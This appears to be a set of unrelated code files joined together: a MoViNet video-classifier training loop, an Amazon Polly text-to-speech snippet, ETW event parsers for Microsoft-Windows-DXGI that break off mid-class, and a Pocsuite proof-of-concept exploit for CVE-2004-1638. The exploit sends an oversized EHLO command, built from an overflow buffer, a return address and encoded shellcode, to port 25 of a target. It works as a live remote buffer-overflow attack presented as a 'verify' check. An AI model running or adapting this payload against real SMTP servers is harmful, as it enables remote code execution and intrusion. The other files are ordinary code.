model = MoViNet(_C.MODEL.MoViNetA0, causal = False, pretrained = True )
start_time = time.time()
trloss_val, tsloss_val = [], []
#class number = 2
model.classifier[3] = torch.nn.Conv3d(2048, 2, (1,1,1)) # class number
#model load
#model.load_state_dict(torch.load('./model_data/class4/Movinet_class4_preY_last_9.pth'))
# print(model)
##train
print("start ")
optimz = optim.Adam(model.parameters(), lr=0.00005)
for epoch in range(1, 9):
print('Epoch:', epoch)
train.train_iter(model, optimz, data_loader_train, trloss_val)
#model save
#torch.save(model.state_dict(),'./model_data/class4/Movinet_class4_preY_last_{}.pth'.format(epoch+1))
#model evauate
train.evaluate(model,data_loader_test, tsloss_val)
print('Execution time:', '{:5.2f}'.format(time.time() - start_time), 'seconds')
|
StarcoderdataPython
|
4887234
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
import struct
import socket,re
def make_overflow_dummy(overflow_len, retaddr):
return 'A' * overflow_len + struct.pack('<L', retaddr)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sc2 = "\xEB"
sc2 += "\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
sc2 += "\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
sc2 += "\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
sc2 += "\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
sc2 += "\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
sc2 += "\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
sc2 += "\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
sc2 += "\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
sc2 += "\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
sc2 += "\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
sc2 += "\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
sc2 += "\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
sc2 += "\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
sc2 += "\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
sc2 += "\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
sc2 += "\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
sc2 += "\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
sc2 += "\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
sc2 += "\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
sc2 += "\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
sc2 += "\x58\x68\x61\x63\x6B\x90"
buffer = make_overflow_dummy(5097, 0x7d17dd13) + '\x41' * 32 + sc2
def poc(url):
ip = re.findall(r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b", url)
try:
s.connect((ip[0],25))
s.send('EHLO ' + buffer + '\r\n')
data = s.recv(1024)
s.close()
return True
except:
return False
class TestPOC(POCBase):
name = 'MailCarrier SMTP服务程序远程缓冲区溢出漏洞'
vulID = 'CVE-2004-1638'
author = ['sxd']
vulType = 'buffer-overflow'
version = '1.0' # default version: 1.0
references = ['http://www.nsfocus.net/vulndb/7052']
desc = '''
MailCarrier SMTP server是一款功能强大的SMTP服务程序。
MailCarrier SMTP server对EHLO/HELO命令处理不正确,远程攻击者可以利用这个漏洞对服务进程进行缓冲区溢出,可能以进程权限执行任意指令。
提交包含超长参数的EHLO/HELO命令,可触发缓冲区溢出,精心构建提交数据可能以进程权限执行任意指令。
'''
vulDate = '2020-03-30'
createDate = '2020-03-30'
updateDate = '2020-03-30'
appName = 'MailCarrier'
appVersion = 'TABS LABORATORIES MailCarrier 2.51'
appPowerLink = ''
samples = ['struct',"socket"]
def _attack(self):
'''attack mode'''
return self._verify()
def _verify(self):
'''verify mode'''
result = {}
response = poc(self.url)
if response:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url + ' MailCarrier SMTP服务程序远程缓冲区溢出漏洞' + ' is exist!'
return self.parse_output(result)
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)
|
StarcoderdataPython
|
11310812
|
import boto3
polly = boto3.client('polly')
# Use Amazon Polly to convert text to speech
res = polly.synthesize_speech(
Text = "Hello, how are you?",
OutputFormat = 'mp3',
VoiceId = 'Joanna')
# Save the response from Amazon Polly into the mp3 file
audiofile = 'myaudio.mp3'
file = open(audiofile, 'wb')
file.write(res['AudioStream'].read())
file.close()
# Play the mp3 file
import IPython
IPython.display.Audio(audiofile)
|
StarcoderdataPython
|
331018
|
# -*- coding: utf-8 -*-
"""
Microsoft-Windows-DXGI
GUID : ca11c036-0102-4a2d-a6ad-f03cfed5d3c9
"""
from construct import Int8sl, Int8ul, Int16ul, Int16sl, Int32sl, Int32ul, Int64sl, Int64ul, Bytes, Double, Float32l, Struct
from etl.utils import WString, CString, SystemTime, Guid
from etl.dtyp import Sid
from etl.parsers.etw.core import Etw, declare, guid
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=1, version=0)
class Microsoft_Windows_DXGI_1_0(Etw):
pattern = Struct(
"pIDXGIFactory" / Int64ul,
"Mode" / Int32ul,
"BlockedAdapters" / Int32ul,
"PnPID" / WString,
"DriverVersion" / WString
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=2, version=0)
class Microsoft_Windows_DXGI_2_0(Etw):
pattern = Struct(
"pIDXGIFactory" / Int64ul,
"Mode" / Int32ul,
"BlockedAdapters" / Int32ul,
"PnPID" / WString,
"DriverVersion" / WString
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=3, version=0)
class Microsoft_Windows_DXGI_3_0(Etw):
pattern = Struct(
"pIDXGIFactory" / Int64ul,
"Mode" / Int32ul,
"BlockedAdapters" / Int32ul,
"PnPID" / WString,
"DriverVersion" / WString
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=4, version=0)
class Microsoft_Windows_DXGI_4_0(Etw):
pattern = Struct(
"pIDXGIAdapter" / Int64ul,
"pIDXGIFactory" / Int64ul,
"KMTAdapterHandle" / Int32ul,
"ThunkDLLHandle" / Int64ul,
"SharedResources" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=5, version=0)
class Microsoft_Windows_DXGI_5_0(Etw):
pattern = Struct(
"pIDXGIAdapter" / Int64ul,
"pIDXGIFactory" / Int64ul,
"KMTAdapterHandle" / Int32ul,
"ThunkDLLHandle" / Int64ul,
"SharedResources" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=6, version=0)
class Microsoft_Windows_DXGI_6_0(Etw):
pattern = Struct(
"pIDXGIAdapter" / Int64ul,
"pIDXGIFactory" / Int64ul,
"KMTAdapterHandle" / Int32ul,
"ThunkDLLHandle" / Int64ul,
"SharedResources" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=7, version=0)
class Microsoft_Windows_DXGI_7_0(Etw):
pattern = Struct(
"pIDXGIOutput" / Int64ul,
"pIDXGIAdapter" / Int64ul,
"VidPnSourceID" / Int32ul,
"GDIDeviceName" / WString
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=8, version=0)
class Microsoft_Windows_DXGI_8_0(Etw):
pattern = Struct(
"pIDXGIOutput" / Int64ul,
"pIDXGIAdapter" / Int64ul,
"VidPnSourceID" / Int32ul,
"GDIDeviceName" / WString
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=9, version=0)
class Microsoft_Windows_DXGI_9_0(Etw):
pattern = Struct(
"pIDXGIOutput" / Int64ul,
"pIDXGIAdapter" / Int64ul,
"VidPnSourceID" / Int32ul,
"GDIDeviceName" / WString
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=10, version=0)
class Microsoft_Windows_DXGI_10_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"pIDXGIFactory" / Int64ul,
"pIDXGIDevice" / Int64ul,
"pIDXGIOutput" / Int64ul,
"UserBackbufferCount" / Int8ul,
"BackbufferCount" / Int8ul,
"ppBackBuffers" / Int64ul,
"pPrimary" / Int64ul,
"pProxyPrimary" / Int64ul,
"Width" / Int32ul,
"Height" / Int32ul,
"RefreshNumerator" / Int32ul,
"RefreshDenominator" / Int32ul,
"Format" / Int32ul,
"ScanlineOrdering" / Int32ul,
"Scaling" / Int32ul,
"SampleCount" / Int32ul,
"SampleQuality" / Int32ul,
"Usage" / Int32ul,
"OutputWindow" / Int64ul,
"Windowed" / Int8ul,
"SwapEffect" / Int32ul,
"Flags" / Int32ul,
"Redirected" / Int8ul,
"LogicalSurfaceHandle" / Int64ul,
"BindId" / Int64ul,
"BackbufferHandles" / Int64ul,
"BackbufferEventHandles" / Int64ul,
"FenceHandle" / Int64ul,
"FenceValue" / Int64ul,
"ActualBufferCount" / Int8ul,
"ActualSwapEffect" / Int32ul,
"WinFlipProxyBufferCount" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=11, version=0)
class Microsoft_Windows_DXGI_11_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"pIDXGIFactory" / Int64ul,
"pIDXGIDevice" / Int64ul,
"pIDXGIOutput" / Int64ul,
"UserBackbufferCount" / Int8ul,
"BackbufferCount" / Int8ul,
"ppBackBuffers" / Int64ul,
"pPrimary" / Int64ul,
"pProxyPrimary" / Int64ul,
"Width" / Int32ul,
"Height" / Int32ul,
"RefreshNumerator" / Int32ul,
"RefreshDenominator" / Int32ul,
"Format" / Int32ul,
"ScanlineOrdering" / Int32ul,
"Scaling" / Int32ul,
"SampleCount" / Int32ul,
"SampleQuality" / Int32ul,
"Usage" / Int32ul,
"OutputWindow" / Int64ul,
"Windowed" / Int8ul,
"SwapEffect" / Int32ul,
"Flags" / Int32ul,
"Redirected" / Int8ul,
"LogicalSurfaceHandle" / Int64ul,
"BindId" / Int64ul,
"BackbufferHandles" / Int64ul,
"BackbufferEventHandles" / Int64ul,
"FenceHandle" / Int64ul,
"FenceValue" / Int64ul,
"ActualBufferCount" / Int8ul,
"ActualSwapEffect" / Int32ul,
"WinFlipProxyBufferCount" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=12, version=0)
class Microsoft_Windows_DXGI_12_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"pIDXGIFactory" / Int64ul,
"pIDXGIDevice" / Int64ul,
"pIDXGIOutput" / Int64ul,
"UserBackbufferCount" / Int8ul,
"BackbufferCount" / Int8ul,
"ppBackBuffers" / Int64ul,
"pPrimary" / Int64ul,
"pProxyPrimary" / Int64ul,
"Width" / Int32ul,
"Height" / Int32ul,
"RefreshNumerator" / Int32ul,
"RefreshDenominator" / Int32ul,
"Format" / Int32ul,
"ScanlineOrdering" / Int32ul,
"Scaling" / Int32ul,
"SampleCount" / Int32ul,
"SampleQuality" / Int32ul,
"Usage" / Int32ul,
"OutputWindow" / Int64ul,
"Windowed" / Int8ul,
"SwapEffect" / Int32ul,
"Flags" / Int32ul,
"Redirected" / Int8ul,
"LogicalSurfaceHandle" / Int64ul,
"BindId" / Int64ul,
"BackbufferHandles" / Int64ul,
"BackbufferEventHandles" / Int64ul,
"FenceHandle" / Int64ul,
"FenceValue" / Int64ul,
"ActualBufferCount" / Int8ul,
"ActualSwapEffect" / Int32ul,
"WinFlipProxyBufferCount" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=40, version=0)
class Microsoft_Windows_DXGI_40_0(Etw):
pattern = Struct(
"Event" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=41, version=0)
class Microsoft_Windows_DXGI_41_0(Etw):
pattern = Struct(
"Event" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=42, version=0)
class Microsoft_Windows_DXGI_42_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"Flags" / Int32ul,
"SyncInterval" / Int32ul,
"DirtyRects" / Int32ul,
"ScrollRects" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=43, version=0)
class Microsoft_Windows_DXGI_43_0(Etw):
pattern = Struct(
"Result" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=44, version=0)
class Microsoft_Windows_DXGI_44_0(Etw):
pattern = Struct(
"ReturnValue" / Int32ul,
"PresentCount" / Int32ul,
"PresentRefreshCount" / Int32ul,
"SyncRefreshCount" / Int32ul,
"SyncQPCTime" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=45, version=0)
class Microsoft_Windows_DXGI_45_0(Etw):
pattern = Struct(
"pIDXGISwapchain" / Int64ul,
"OldUserBackbufferCount" / Int8ul,
"OldBackbufferCount" / Int8ul,
"ppOldBackBuffers" / Int64ul,
"pOldPrimary" / Int64ul,
"pOldProxyPrimary" / Int64ul,
"OldWidth" / Int32ul,
"OldHeight" / Int32ul,
"OldFormat" / Int32ul,
"OldFlags" / Int32ul,
"OldRedirected" / Int8ul,
"OldLogicalSurfaceHandle" / Int64ul,
"OldBackbufferHandles" / Int64ul,
"OldFenceHandle" / Int64ul,
"OldFenceValue" / Int64ul,
"OldActualbufferCount" / Int8ul,
"OldWinFlipProxyBufferCount" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=46, version=0)
class Microsoft_Windows_DXGI_46_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"ReturnValue" / Int32ul,
"NewUserBackbufferCount" / Int8ul,
"NewBackbufferCount" / Int8ul,
"ppNewBackBuffers" / Int64ul,
"pNewPrimary" / Int64ul,
"pNewProxyPrimary" / Int64ul,
"NewWidth" / Int32ul,
"NewHeight" / Int32ul,
"NewFormat" / Int32ul,
"NewFlags" / Int32ul,
"NewRedirected" / Int8ul,
"NewLogicalSurfaceHandle" / Int64ul,
"NewBackbufferHandles" / Int64ul,
"NewFenceHandle" / Int64ul,
"NewFenceValue" / Int64ul,
"NewActualbufferCount" / Int8ul,
"NewWinFlipProxyBufferCount" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=47, version=0)
class Microsoft_Windows_DXGI_47_0(Etw):
pattern = Struct(
"pDXGISwapChain" / Int64ul,
"Width" / Int32ul,
"Height" / Int32ul,
"RefreshNumerator" / Int32ul,
"RefreshDenominator" / Int32ul,
"Format" / Int32ul,
"ScanlineOrdering" / Int32ul,
"Scaling" / Int32ul,
"Windowed" / Int8ul,
"pOldPrimary" / Int64ul,
"pOldProxyPrimary" / Int64ul,
"OldWinFlipProxyBufferCount" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=48, version=0)
class Microsoft_Windows_DXGI_48_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"ReturnValue" / Int32ul,
"pNewPrimary" / Int64ul,
"pNewProxyPrimary" / Int64ul,
"NewWinFlipProxyBufferCount" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=49, version=0)
class Microsoft_Windows_DXGI_49_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"OldWindowed" / Int8ul,
"pOldOutput" / Int64ul,
"pOldPrimary" / Int64ul,
"pOldProxyPrimary" / Int64ul,
"OldWinFlipProxyBufferCount" / Int8ul,
"OldSwapEffect" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=50, version=0)
class Microsoft_Windows_DXGI_50_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"ReturnValue" / Int32ul,
"NewWindowed" / Int8ul,
"pNewOutput" / Int64ul,
"pNewPrimary" / Int64ul,
"pNewProxyPrimary" / Int64ul,
"NewWinFlipProxyBufferCount" / Int8ul,
"NewSwapEffect" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=51, version=0)
class Microsoft_Windows_DXGI_51_0(Etw):
pattern = Struct(
"pIDXGIOutput" / Int64ul,
"WidthToMatch" / Int32ul,
"HeightToMatch" / Int32ul,
"RefreshNumeratorToMatch" / Int32ul,
"RefreshDenominatorToMatch" / Int32ul,
"FormatToMatch" / Int32ul,
"ScanlineOrderingToMatch" / Int32ul,
"ScalingToMatch" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=52, version=0)
class Microsoft_Windows_DXGI_52_0(Etw):
pattern = Struct(
"pIDXGIOutput" / Int64ul,
"ReturnValue" / Int32ul,
"WidthResult" / Int32ul,
"HeightResult" / Int32ul,
"RefreshNumeratorResult" / Int32ul,
"RefreshDenominatorResult" / Int32ul,
"FormatResult" / Int32ul,
"ScanlineOrderingResult" / Int32ul,
"ScalingResult" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=53, version=0)
class Microsoft_Windows_DXGI_53_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"NewRedirected" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=54, version=0)
class Microsoft_Windows_DXGI_54_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"BackBufferNumber" / Int32ul,
"BackBufferHandle" / Int64ul,
"BackBufferEventHandle" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=55, version=0)
class Microsoft_Windows_DXGI_55_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"Flags" / Int32ul,
"SyncInterval" / Int32ul,
"NumPlanes" / Int32ul,
"LayerMask" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=56, version=0)
class Microsoft_Windows_DXGI_56_0(Etw):
pattern = Struct(
"Result" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=57, version=0)
class Microsoft_Windows_DXGI_57_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"NumPlanes" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=58, version=0)
class Microsoft_Windows_DXGI_58_0(Etw):
pattern = Struct(
"Result" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=59, version=0)
class Microsoft_Windows_DXGI_59_0(Etw):
pattern = Struct(
"pIDXGIOutput" / Int64ul,
"MaxPlanes" / Int32ul,
"OverlayMaxRGBPlanes" / Int32ul,
"OverlayMaxYUVPlanes" / Int32ul,
"OverlayCaps" / Int32ul,
"PanelFitterMaxRGBPlanes" / Int32ul,
"PanelFitterCaps" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=60, version=0)
class Microsoft_Windows_DXGI_60_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"LayerIndex" / Int32ul,
"Enabled" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=61, version=0)
class Microsoft_Windows_DXGI_61_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"KernelSupport" / Int8ul,
"DriverFailed" / Int8ul,
"InvalidParam" / Int8ul,
"NumPlanes" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=62, version=0)
class Microsoft_Windows_DXGI_62_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"hResource" / Int64ul,
"SubResourceIndex" / Int32ul,
"Flags" / Int32ul,
"SrcRectleft" / Int32ul,
"SrcRectright" / Int32ul,
"SrcRecttop" / Int32ul,
"SrcRectbottom" / Int32ul,
"DstRectleft" / Int32ul,
"DstRectright" / Int32ul,
"DstRecttop" / Int32ul,
"DstRectbottom" / Int32ul,
"ClipRectleft" / Int32ul,
"ClipRectright" / Int32ul,
"ClipRecttop" / Int32ul,
"ClipRectbottom" / Int32ul,
"Blend" / Int32ul,
"ColorSpace" / Int32ul,
"StretchQuality" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=63, version=0)
class Microsoft_Windows_DXGI_63_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"Width" / Int32ul,
"Height" / Int32ul,
"DXGIFormat" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=64, version=0)
class Microsoft_Windows_DXGI_64_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"Enabled" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=65, version=0)
class Microsoft_Windows_DXGI_65_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"Enabled" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=66, version=0)
class Microsoft_Windows_DXGI_66_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"Enabled" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=67, version=0)
class Microsoft_Windows_DXGI_67_0(Etw):
pattern = Struct(
"pIDXGISwapchain" / Int64ul,
"Result" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=68, version=0)
class Microsoft_Windows_DXGI_68_0(Etw):
pattern = Struct(
"pIDXGIOutput" / Int64ul,
"Format" / Int32ul,
"ColorSpace" / Int32ul,
"OutputFlags" / Int32ul,
"Result" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=69, version=0)
class Microsoft_Windows_DXGI_69_0(Etw):
pattern = Struct(
"pIDXGISwapchain" / Int64ul,
"ColorSpace" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=70, version=0)
class Microsoft_Windows_DXGI_70_0(Etw):
pattern = Struct(
"Index" / Int32ul,
"Code" / Int32ul,
"ThreadId" / Int32ul,
"Message" / CString
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=71, version=0)
class Microsoft_Windows_DXGI_71_0(Etw):
pattern = Struct(
"pIDXGISwapchain" / Int64ul,
"BackbufferCount" / Int8ul,
"BackbufferHandles" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=72, version=0)
class Microsoft_Windows_DXGI_72_0(Etw):
pattern = Struct(
"pIDXGISwapchain" / Int64ul,
"KeepExistingContent" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=73, version=0)
class Microsoft_Windows_DXGI_73_0(Etw):
pattern = Struct(
"pIDXGIFactory" / Int64ul,
"ReparentingOccurred" / Int8ul,
"DecidingFactor" / Int32ul,
"Message" / CString
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=74, version=0)
class Microsoft_Windows_DXGI_74_0(Etw):
pattern = Struct(
"pIDXGISwapchain" / Int64ul,
"m_pPreferredOutput" / Int64ul,
"NewSyncInterval" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=80, version=0)
class Microsoft_Windows_DXGI_80_0(Etw):
pattern = Struct(
"riid" / Guid,
"ppFactory" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=81, version=0)
class Microsoft_Windows_DXGI_81_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=104, version=0)
class Microsoft_Windows_DXGI_104_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"riid" / Guid,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=105, version=0)
class Microsoft_Windows_DXGI_105_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=106, version=0)
class Microsoft_Windows_DXGI_106_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=107, version=0)
class Microsoft_Windows_DXGI_107_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=108, version=0)
class Microsoft_Windows_DXGI_108_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=109, version=0)
class Microsoft_Windows_DXGI_109_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=110, version=0)
class Microsoft_Windows_DXGI_110_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"uiDataSize" / Int32ul,
"pData" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=111, version=0)
class Microsoft_Windows_DXGI_111_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=112, version=0)
class Microsoft_Windows_DXGI_112_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pInterface" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=113, version=0)
class Microsoft_Windows_DXGI_113_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=114, version=0)
class Microsoft_Windows_DXGI_114_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pDataSize" / Int32ul,
"pData" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=115, version=0)
class Microsoft_Windows_DXGI_115_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul,
"pDataSize" / Int32ul,
"pData" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=116, version=0)
class Microsoft_Windows_DXGI_116_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"riid" / Guid,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=117, version=0)
class Microsoft_Windows_DXGI_117_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=118, version=0)
class Microsoft_Windows_DXGI_118_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"iOutput" / Int32ul,
"ppOutput" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=119, version=0)
class Microsoft_Windows_DXGI_119_0(Etw):
